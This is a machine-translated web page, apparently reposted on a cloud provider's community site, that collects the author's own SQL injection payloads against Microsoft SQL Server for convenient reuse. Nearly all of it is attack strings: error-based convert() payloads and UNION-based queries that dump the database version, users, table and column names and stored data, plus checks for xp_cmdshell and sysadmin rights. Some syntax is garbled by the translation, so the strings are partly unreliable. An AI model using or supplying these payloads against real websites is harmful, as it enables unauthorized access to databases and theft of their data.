MSSQL injection in error-and-error mode

Source: Internet
Author: User
Tags explode

Title:mssql injection in explicit and non-error mode--2010-10-27 19:51

The recent use of manual injection with the habit, then list the most recent use of the MSSQL statement, later convenient to use!

--------------------------------------------------------------------------------------------------------------- --------------------

MSSQL Comment Symbol:

#

--

Error-mode:

Determine if multiple rows are supported

;d Eclare @x int--

View Current database version

Url?id=13 and @ @version >0--

View current Connected Database users

Url?id=13 and user>0--

View the current database name

Url?id=13 and db_name () >0--

Explode database name

Url?id=13 and 1=convert (int, (select name from master.dbo.sysdatabases where dbid=7))--

Dbid<7 is the system library name

Explode the current database table name

Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U '))--

Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 '))--

Explode other database table names

Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ')--

Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (' Table name 1 ', ' Table Name 2 '))--

Burst field Name

Url?id=13 having 1=1--

URL?ID=13 Group By table name. field Name 1, field name 2 having 1=1--

Explode the field names of other tables

URL?ID=13 select * FROM table name having 1=1--

URL?ID=13 select * FROM table name Group by table name. field Name 1, field name 2 having 1=1--

Expand it.

Url?id=13 and 1=convert (int, (SELECT * from table name having 1=1)--field name

Url?id=13 and 1=convert (int, (SELECT * from table name Group by table name. Field name having 1=1))--Field name

Burst data

Url?id=13 and 1=convert (int, (select top 1 field name from table name))--

Url?id=13 and 1=convert (int, (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--

Url?id=13 and 1=convert (int, (select TOP1 field name from table name where field name = = ' Data 1 ' and field name! = ' Data 2 '--

You can also use the WHERE statement

No error mode

url?id=13 Order By Field number

URL?ID=13 and 1=2 Union select?,?,?,?,?--

Querying the database version and system version

URL?ID=13 and 1=2 Union select?,?,?, @ @version--

Querying database user Names

URL?ID=13 and 1=2 Union select?,?,?, (Select User)--

URL?ID=13 and 1=2 Union select?,?,?, (select System_user)--

Query Host Name

URL?ID=13 and 1=2 Union select?,?,?, (select HOST_NAME ())--

Querying database names

URL?ID=13 and 1=2 Union select?,?,?, (select Db_name ())--

Determine storage extension xp_cmdshell

URL?ID=13 and 1=2 Union select?,?,?, (SELECT COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' xp_cmdshell ')--

1 for existence, 0 for non-existent

Determine current database user permissions

URL?ID=13 and 1=2 Union select?,?,?, (select Is_srvrolemember (' sysadmin '))--

Querying database names

URL?ID=13 and 1=2 Union select?,?,? (select name from master.dbo.sysdatabases where dbid=7)--

DBID<7 is the system database name

Querying database table names

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ')--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 ')--

Query field name

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ')--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ') and name not in (' Field name 1 ', ' Field Name 2 ')--

Querying data

URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name)--

URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--

The other statements

Name of the exploded table

Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' u ' and name is not in (select top 0 name from sysobjects where xtype= ' u ')) fro M sysobjects--

Then query the table name (the number of the second top n is incremented from 0 to traverse the current database table name.

Explode other database table names

Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (select top 0 name from [database name]: sysobjects where xtype= ' u ')

Explode field

URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from syscolumns where ID in (select id from sysobjects where name= ' table name ') and name not in (select Top 2 n Ame from syscolumns where ID in (select id from sysobjects where name= ' table name '))) from sysobjects--

Add the second top N number from 0 to traverse the field name of the admin table.

Querying data

Url?id=13 Url?id=13 and 1=2 Union select top 1?,?, field name from table name where name not in (select top 0 name from table name)--

MSSQL injection in error-and-error mode

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.